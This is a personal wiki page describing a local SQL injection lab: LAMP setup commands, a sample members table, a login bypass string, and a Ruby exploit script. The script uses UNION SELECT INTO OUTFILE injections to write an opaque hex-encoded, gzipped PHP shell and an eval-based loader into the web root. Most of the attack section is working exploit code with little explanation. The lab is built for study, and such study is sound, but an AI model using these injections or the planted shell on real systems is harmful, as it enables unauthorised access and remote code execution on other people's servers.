MySQL Injection

From SobellWiki

Jump to: navigation, search

Contents

Setup

Install the lamp stack: 

sudo tasksel install lamp-server

Copy files: 

Project Files
www (place in /var/www/)

also in the sql_i_files.rar archive: 

screenshots
papers detailing complex SQLi attacks
SQL DB
my presentation

Add database: 

mysql -u root -p pen_test < pen_test_db.sql

Database

mysql> CREATE TABLE members (
    -> id int(4) NOT NULL auto_increment, 
    -> username varchar(65) NOT NULL default ,
    -> password varchar(65) NOT NULL default ,
    -> admin BOOL NOT NULL default 0,
    -> PRIMARY KEY (id) );

mysql> INSERT INTO members VALUES(1,'john','1234');

mysql> select * from members;
+----+----------+----------+-------+
| id | username | password | admin |
+----+----------+----------+-------+
|  1 | john     | 1234     |     0 | 
+----+----------+----------+-------+

Simple Attack

user: anything' or '1'='1 password: anything' or '1'='1

Complex Attack

See http://maxsobell.com/wp/wp-content/uploads/2009/12/Weaponized-SQLi.pdf 

#!/usr/bin/ruby
require 'ftools'
require 'net/http'  
require 'multi'
require 'zlib' 

puts "Choose an exploit:\n"
puts "(1) using upload\n"
puts "(2) using SQLi\n"
choice = gets.chomp
if choice == "1" then
  ## upload the payload
  upload_url = URI.parse('http://localhost/upload.php')
  ## compress the original shell file:
  if File.exist?('/tmp/payload.gz') then
    file = File.open('/tmp/payload.gz')
  else
    if File.exist?('/var/www/tools/phpshell_to_encode.php') then
      to_encode = File.read('/var/www/tools/phpshell_to_encode.php')
    else
      puts 'Oops, where\'s the file to encode\? Put it in /var/www/tools/'
      exit
    end
    Zlib::GzipWriter.open('/tmp/payload.gz') do |gz|
      gz.write to_encode
      gz.close
    end
  end

  ## from http://stackoverflow.com/questions/184178/ruby-how-to-post-a-file-via-http-as-multipart-form-data
  data, headers = Multipart::Post.prepare_query('uploaded' => file)
 
  http = Net::HTTP.new(upload_url.host, upload_url.port)
  res = http.start {|con| con.post(upload_url.path, data, headers) }
 
  ## inject the file opener
  url = URI.parse('http://localhost/checklogin.php')  
  post_args = {
    'myusername' => "anything",
    'mypassword' => "' union select \"<?php $gzfile = 'payload.gz';$gzhandle = gzopen($gzfile, 'rb');$zipped_content = gzread($gzhandle,5715);gzclose($gzhandle);eval($zipped_content);?>\" INTO OUTFILE '/var/www/upload/payload.php"
  }
  resp, data = Net::HTTP.post_form(url, post_args)
elsif choice == "2" then
  ## inject the payload in gz form
  url = URI.parse('http://localhost/checklogin.php')  
  post_args = {
    'myusername' => "anything",
    'mypassword' => "' union select 0x1f8b0800000000000203bc186b539c4af6f3ceaf68a9a9c0ac0a6af221352f376bbc955b65a215279bda1a27540bcdc01568966e1cdd1bfffb9ed30d080c63525bd9e583429ff7fbf438cef4340bb34150a49e8c784a84cca34cc454844cb83e639935bca771c146e4cf0181270a88150997e6397dac402305c12767b2c853a2a06e4233cbdce2671e90926ca2c8582c5897be4964d5d84f83014a5f3309acd791e7feabe012b8ae33cf2a7518ba5797d70b32eb33438180cd60e8f124a1a94f002f1282c912b6344b80b91afde5946c1d8e4d733218e67c2394ae5d6204b429f5c9d83c7983841e8f8b24157d5215a02bb53c1c9b6f8f4cd4da67012d62e902a98cd2b5003e3a0a66c81376e84739f324cf1f4d329b13d336d154c18480a8ba42d25c5aca78f7fafcfafaf7cb4f4b93163264a98c3c2a199807fc645eb089f6f26e3cc80442ea5c6049261f9bd8de0671aa74d14169034150ce689c51195ac3288d96666592b95a768d599569d261144642836b2ff4e3f14266855468183d843e0d1aeaef95fa97416ee98d7050b092008ea7b917d6b807bdfa0087bdd98c0414d2fab92ef029521df46d9ae5306a9a59bf68b1401746413f25e850693e193428fb3c60830b86c424764d03afc64d6a40c49b26b39cad2df3db7239be8d697a375eadfeeaf9cdafa1d910db74d82f0df693ea0c3fa3d0beb5fc3659ed8f9a7ac11b50892df5546a236479bcfaf3e88940a84cc7ec62294352b671413530a02298b490b4823fa0ec7ac3467118827e96834e06e0b309a398110b3a5ac6a11b96cc0f80918d9aefc8b68e2240ede62c8ba9c72c4588f4e8af1265d448829785feb7327f5664069e81fe2ea1d2ccefce8d7d635ba77b37f6e87b93f445b98a432df8bb73bafce6acf63bacccb6263d7e57a95273c5fe316a4a015b7692fdcd0b01c97a56b72f4bb60ba5c2ffd93ceb2f72c3f3c7c4e345ec93944be285345d3322f9b8e6af6afec5bc7b2e3e98a3c9737b547e600f91dc2a9998af41096bab8001ad85577aa63b2f3ab9a05a33740b17863dec1034606ec27d66f67a122c67e9bd657ebefc7a3dd3c505837734d989787679f1e5e3a712b71cb4a3ae47da5d2d66e95a863aa93d91a58d2960901b6974c88792dfb114d18b5ba068601f1d54cc3a247ab1522342b5491a4714c6374e07c56cd597f4552387dce927020bb75468cb6feb1df1be81aa40992a2deeb93c630dfbb7946a3c9ad1312e24e5aa924519c3eadb98a31729f573d24ff93229d8b0a3b5ec058c07e05e0e8df74735d9aca85026b1c89817d118aa2917560069292a463f61c78ee7fcd3c23dbbfc78f56e01767d59fc76f8d61cf517e60e334e7e951927ff4f335a1f811773c12a5f4e76c14eba309589253c6b769d41a37c7b17d4e6aad65852ff106e99d22e626087378c6a65ecb6e021131ecd985fef86eaae437dbfbc72983b96c3c90fe44137c1a61425590cedce32d5c1412d6e84fb43ad145e881ce7743e98eebdbf3c5bfcf3ea9c7c587cbc20575ffe7ef1fb19310e1de7ebeb33c779bf78af016feca363c739ff6420bd114a998d1d67b3d9d89bd736cfd7cee2b38339f2c6c1db93276d5ffa0670c733fcc7a83f07caa98c64cce6571faec875c8e2989cd8c753471f22388ed23bd8f9e29921e463ccc01d4c1a24cc59509ed89e1006918f199b19923d4807bfe718b1a9f0e0da269bb03fe83dd5a71ae59ee6c42bf21c2e242e4862e0b7a34975def6274c3bf24e350f75c725cc0bf9b6df4fe7a38a1e6227353f38a86fc477ecd16a5d7ff7e00bd151f6264a7dbeb1d93de83369249d0d546710421c98afdf9257afda4a4f5bbadaba211f1e3f276413bc6c92e29ee073af48e0c016e87fbbc4b5d53db9cab026cdfe7e75fa122530de2d75b255564d0bdf1c6d59382747ff236b0e0f7fa5354fad58c310851da6d4bbc31e46f33b0985710b5b8465c0a59883802c66926195f220a896800e9d6ec13624318fe305cfb64d6e617c60d13a94bd9c2a030338167a3e2bf5a78eae1028524757e9607acbfd47c2d398537f6668b3b080a6e171b772e104ce039e2724a509d49d126610aa5c32339ac5033dedf33fce3f2f4de001ef17bfc164399d1b246132e420082e0baa4ea741c4621f3ca63b025bb3d49f9fe91090af3cbf830b20795fddfbc664ea4126cdf54f512ab44adcf6c4eaee8d072f0c9fd3f9d4d16c9d5201d0cb8fee49e4636fc99328a531f637ec33142ea9a5f93a1a065e5b7d70e0e3cca8de0c48a958b43d52fdaa835ec0b5b30d553f160108a428db86987ea2de0ba1131569eb665fcdeb037533074b86194c15f4567d9f62545a083c20097db0709f4429fbc7e49068f6232053e273bdbc571cecbec500707182389513e03d531e82019ba8a60bb3ea557a2bb2c9344a81a4f452998bcd3e6e6c6d103c852651643343f550ec91238388e8dfacd7878727ca8b92de4253650f33e318fde664f807e286e1cb543e898ce26f84304a664600192ec724c7a231e6d7c01bb2492bdad0ac541a1d55297082ea820775ef9d19af0da21ac78e009257324a9898f430073e954f941dcf127eccbf24191025040a194c431b072d31902d49246b06e70fcc832644ceca1828a7f4e16bb5f4d5aca6bed09fa56be1ef73ade207f401f5820d4435149cfeff010000ffff0300e05a4f0727160000 into dumpfile '/var/www/upload/payloadh.gz"
  }
  resp, data = Net::HTTP.post_form(url, post_args)
  ## inject the file opener
  post_args = {
    'myusername' => "anything",
    'mypassword' => "' union select \"<?php $gzfile = 'payloadh.gz';$gzhandle = gzopen($gzfile, 'rb');$zipped_content = gzread($gzhandle,5715);gzclose($gzhandle);eval($zipped_content);?>\" into outfile '/var/www/upload/payloadh.php"
  }
  resp, data = Net::HTTP.post_form(url, post_args)
end
puts resp.body + "\n\n"
puts "Visit http://localhost/upload/payload.php\n\n"
Retrieved from "http://maxsobell.com/wiki/index.php?title=MySQL_Injection"
Personal tools